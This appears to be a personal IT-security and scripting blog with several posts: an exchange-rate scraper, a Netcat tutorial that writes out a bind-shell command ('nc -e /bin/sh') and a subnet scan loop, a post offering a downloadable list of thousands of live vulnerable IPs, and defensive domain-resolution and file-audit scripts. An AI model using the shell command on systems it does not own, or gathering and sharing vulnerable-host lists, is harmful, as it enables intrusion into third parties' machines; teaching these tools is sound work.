Monday, 25 May 2020

How-To: Get Live Exchange Rates to the Terminal

How-To: Get Live Exchange Rates to the Terminal




Today I wanted to showcase a python script I wrote to scrape a website and retrieve live exchange rates from around the world.  Above you will see the output of the script.

What is the value of this?  Well for one the data is live as soon as the script is run.  Now that the script is created you could feed this data into another function in the script or send it to another program entirely, essentially you can manipulate the data however you want.

A piece that I am not highlighting in this blog entry is the whole process behind finding viable targets to scrape and the process around how to efficiently anlayze the source code.  When you are developing a script to scrape, the code is built around the structure of that site.  You are literally searching through code that someone else has designed.  What happens when their code changes? Even a little?  Your whole scrape script could be broken.  That is why care and attention should be taken when selecting a target.  I will highlight some of my process in a future blog entry.

(You should know that this code was built around a specific target, it will not work on a different target.  The goal here is to give you the right push to take this script and build it around a target of your choosing. )

Lets go through this script and take a look at some of the specific elements that can lead to a good data scrape.

import os
from bs4 import BeautifulSoup
import requests
from prettytable import PrettyTable

if os.name == "nt":
    os.system("cls")
else:
    os.system("clear")


countryGrab = []
compareToUSD = [] #america
compareToEUR = [] #europe
compareToJPY = [] #japan
compareToGBP = [] #Britina
compareToCHF = [] #switzerland
compareToCAD = [] #Canada
compareToAUD = [] #Australia
compareToHKD = [] #hongkong

x = PrettyTable()
x.field_names = ["Country","USD","EUR","JPY","GBP",
"CHF","CAD","AUD","HKD"]


url = "<insert website here>"
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
results = soup.find("tbody")

rows = results.find_all("tr")
num = 0
for row in rows:
    cell = row.find_all("td")
    
    links = cell[0].find_all('a')
    countryGrab.append(links[1].text)

    compareToUSD.append(cell[1].text)
    compareToEUR.append(cell[2].text)
    compareToJPY.append(cell[3].text)
    compareToGBP.append(cell[4].text)
    compareToCHF.append(cell[5].text)
    compareToCAD.append(cell[6].text)
    compareToAUD.append(cell[7].text)
    compareToHKD.append(cell[8].text)
    
    x.add_row([countryGrab[num],compareToUSD[num],
    compareToEUR[num],compareToJPY[num],
    compareToGBP[num],compareToCHF[num],
    compareToCAD[num],compareToAUD[num],
    compareToHKD[num]])
    num = num +1

print(x)





Let's take a look at a few key pieces in the script:
 import os
from bs4 import BeautifulSoup
import requests
from prettytable import PrettyTable

if os.name == "nt":
    os.system("cls")
else:
    os.system("clear")

There are three key modules at work here. 
1. Bs4 (Scraping module)
2. Requests (module containing functions for manipulating and http)
3. PrettyTable (displaying data in table format)

Bs4/BeautifulSoup is widely used, it allows us to take a grabbed website and cycle through tags to find the content we want.  I will not be going in depth on BeautifulSoup in this blog (saving that for another entry)

Requests, also very popular, this module goes hand in hand BeautifulSoup.  It is used to actually grab the website and makes an object for the BeautifulSoup to sift through.

Prettytable: It's in the name really

Above you also see that I am clearing the screen.  I use a quick and dirty technique to clear the screen.  Using "os.name" we can determine what type of Operating system the script is running on.  Depending on the result the terminal will be cleared.


####################################################
 
countryGrab = []
compareToUSD = [] #america
compareToEUR = [] #europe
compareToJPY = [] #japan
compareToGBP = [] #Britina
compareToCHF = [] #switzerland
compareToCAD = [] #Canada
compareToAUD = [] #Australia
compareToHKD = [] #hongkong

x = PrettyTable()
x.field_names = ["Country","USD","EUR","JPY","GBP",
"CHF","CAD","AUD","HKD"]

Here I am creating some empty lists that are going to get filled up in just a moment

Underneath the empty lists I create an object "x" for the PrettyTable, followed the names for the table headers.  As you can see these are the countries.

####################################################
 url = "<insert website address here"
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
results = soup.find("tbody")

rows = results.find_all("tr")
num = 0
-url variable set with string of website address
-create page object using requests
-create soup object with content from page
-create results object, at this point we are searching for the table tag called "tbody"
-inside results object, we have stored all the website content that was inside the tags "tbody".  We want to dive deeper inside "tbody".  Now create another object where we search inside "tbody" for all rows "tr".  The new object is called rows


####################################################
 for row in rows:
    cell = row.find_all("td")
    
    links = cell[0].find_all('a')
    countryGrab.append(links[1].text)

    compareToUSD.append(cell[1].text)
    compareToEUR.append(cell[2].text)
    compareToJPY.append(cell[3].text)
    compareToGBP.append(cell[4].text)
    compareToCHF.append(cell[5].text)
    compareToCAD.append(cell[6].text)
    compareToAUD.append(cell[7].text)
    compareToHKD.append(cell[8].text)
    
    x.add_row([countryGrab[num],compareToUSD[num],
    compareToEUR[num],compareToJPY[num],
    compareToGBP[num],compareToCHF[num],
    compareToCAD[num],compareToAUD[num],
    compareToHKD[num]])
    num = num +1

print(x)

-inside our object rows we have a bunch of entries, lots of rows to search through.  Within each row we have cells ("<td></td>)"  The data we want is within the cells_
- when we cycle through each row, we search for all cells based on the tag "td"
- since I spent a bit of time looking through the source code of the site I know which cells contain the data I want.  Here you can see that I am calling on particular cells and appending to the lists that were created earlier.
-Once the lists are filled we are ready to print the whole table!

There you go, a python script that grabs the up-to-date exchange rates from around the world!
A copy of the script is in my "Projects" page.

Thanks!!
Andrew Campbell








Tuesday, 19 May 2020

Netcat - The TCP/IP Swiss Army Knife

Hey,

This week I wanted to share some information about a very useful network tool.  Netcat, originally released in '95 is one extremely powerful little utility.  With a few simple key strokes one can scan ports on local/remote machine, connect to remote machine, send files over your local net, conduct host discovery and manage a machine remotely using reverse shell. 

People refer to Netcat as "The TCP/IP Swiss Army Knife."  A reason for this is that a lot of other network tools, or utilities you find in in distros like Kali have a very specific purpose (they do that "thing" and that is it).  Netcat is not like this and it is for this reason that being adept with this tool is imperative for any sysadmin/hacker.

Listening and Connecting:

Opening a port and have it listening can be very useful, also potentially dangerous if you forget about it.  An open port is an open port.


At this point anyone scanning your machine will be fed some information saying that your machine is open and ready to receive connections.
A quick port scan of this specific port will tell us some information about the port.  We will dive deeper into port scanning in a bit.

We can open a port set it to listening, lets connect to the listening port and send some messages between.



-l --> listening
-v --> verbose
-p --> port

listening machine -->  nc -lvp 4000 
connecting machine -->  nc <target ip> <port>

Sending a File:
It is possible to send files over your local network between machines.  It is also useful to know that you are not limited to text files.  You can send pictures and more.  Practice sending different files to fully understand the intricacies.



Make note that the receiving machine "listening" is intentionally putting the data into a specific holder "doc.received."  A tip, look at the direction of the ">". This symbol denotes the direction of the data.

nc -lvp 4000 > doc.received (data will be put into holder "doc.received")

nc 192.168.1.77 4000 < doc.sent (data currently in "doc.sent" is being sent to 192.168.1.77 through port 4000


Port Scan:
Netcat can be used to quickly check ports on local and remote machines.  Here I am checking the same local machine I was connecting to before.  I have opened up 3 ports.  If there were other ports in use they would have been discovered as well.

-n --> no name resolution
-v --> verbose
-z --> I/O mode [used for scanning]
In the image you can see that I have selected a range of 1-200

You can also port scan websites.  Below I am scanning a popular port.  IP has been blacked out for obvious reasons.

Netcat will never replace other more popular port scanner (nmap etc.) however in a pinch Netcat can get the job done.


Reverse Shell:

How about gaining complete control of a remote machine?  Completely possible with Netcat. Lets take a look at the next couple images


Our target machine will have this command running on it's system

nc -lvp 4000 -e /bin/sh

"attacker" will connect to the target like so

nc <ip address> 4000

because the target machine is has a listening port open and is redirecting traffic to a shell the connecting machine will have complete control of the target.

As you can see in the window I was able to do an "ls" and show everything in the directory.

Host Discovery:

Last interesting thing to show you today.  We can use Netcat to probe the network and discover hosts.


for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Take a look at the above line, when we input it into a terminal it will start a for loop, conduct a port scan on port 443 for all IP addresses between 192.168.1.21-29.  It is not incredibly fast, but if you find yourself in an environment without any gui, Netcat could be very helpful.

Thanks, I hope this helps.  I have included a link to a pdf for some more information on Netcat

Andrew Campbell


https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf


Over 17,000+ Live Vulnerable Sites Found!

Hey,

So I have been scraping for live vulnerable IPs for a week and I have crossed the 17,000+ mark!  I'm still working out some bugs in the process, however the result has been great.

I have scraped way more then 17,000, somewhere in the range of 50,000+.  I have built into my scraping process an automatic check to see if an IP is live.  That means that the list I am sharing has a very high level of probability on being live....right now.

I am continuing to strengthen the scraping process and automate it even more.  Feel free to download the zip file from my page "Vulnerable IP"

Thanks!
Andrew Campbell

Tuesday, 12 May 2020

Convert List of Domain Names to their IP - Python

Hello All,

In this post we are going to use python socket module and file handling to convert a file of confirmed malicious domain names into their respective IP address.  After the list has been processed one could take the list of IP addresses and add these to your company/personal firewall.


Below is a list of actual bad domains[you probably shouldn't visit these ;) ]
This is list we will be using in our demonstration

Image below is the output after the script is run.  

*notice that 9 domains went into the grinder and only 5 IP addresses came out.  If you look at the python code more closely you will see  "Try..Except" where we raise an exception for a specific error "socket.gaierror."  When the socket module attempts to resolve the domain name, some domains are not able to be resolved so an error is sent.  A possible cause of this is the domain is not in action any more.  However getting the 5 as output shows that these bad websites are still reachable.

General Functionality:
-Script opens a file of bad domains
-cleans the input and sends the value to a function that puts that value through a functionality of the socket module that retrieves IP address
-Finally the retrieved IP addresses are exported to an output file.

Deeper Dive:
1-2: import modules
5-6: create file object and create a list "row" that contains all the lines of the file "malwaredomainlist.txt"
17-24: for each line in row send domain to getIP function, returned IP, send IP to output function to be added to output.txt 


There are other ways to retrieve the IP address of a website like:

nslookup <site address>

or

ping <site address>

These tools are great and useful, however if you have a huge batch of domains to process, having a python script on hand can be extremely useful and time saving.

Shabbyporpoise

Sunday, 10 May 2020

File System Auditor - Extension Locator

Hello,

I wanted to share a quick bit on a python script I wrote.  I have also attached a video demonstrating it.
ext_locator.py



executable files in an operating system can be packed with goodies that you are not aware of.  Obviously doing an AV test on your system would be a critical route, however if you are doing a static analysis of a system, you could use a tool similar to this.

Functionality:
-user inputs parent directory
-script walks through entire directory searching for extensions matching the list
-any file matching, the absolute path is saved to a text file

Purpose:
-In a safe way determining whether there are abnormal amounts of executable programs located somewhere the system.
-extensions in this list have been known to be packed with extra code that can link to malware
-narrow your search when analyzing a system.

Friday, 8 May 2020

The First One - The Beginning

Hello All,

this post is the first blog post.  I am excited to be starting on this blogging journey discussing my favourite topics; IT Security and Automation. 

In my career I have had a number of opportunities to expand my knowledge in this area through IT Auditing and script development.  Currently I teach at a polytechnic school in Canada and I am daily pushed to expand the bounds of my knowledge and stretch myself further.  I love the challenge of teaching IT Security.  I am in the perfect field, because learning is what I crave.

The goal for this blog is to be a centralized location for collaboration and the sharing of knowledge.  I know there are many excellent places across the internet to do this very same thing.  However there is something about starting something on your own. 

I absolutely love scripting, it is so satisfying seeing your work assist others.  I love taking repetitive tasks and turning them into jobs that can run on their own.  Automation is awesome because a successfully created script can do the same task over and over and do it with 100% accuracy every single time.

I plan on sharing scripts that I am developing, hopefully they can be of some assistance to someone out there.  The complexity level will range and the jobs tackled will vary.  I am sure that there are some senior level programmers out there that will see my code and cringe.  Feel free to inform me.  I hope that everyone who reads this is similar to me in that we want to learn and expand our knowledge.

I am also open to suggestions for additions to projects.  If a script is missing a key feature, let me know and I can include it :)

Thanks Everyone

Regards,
Andrew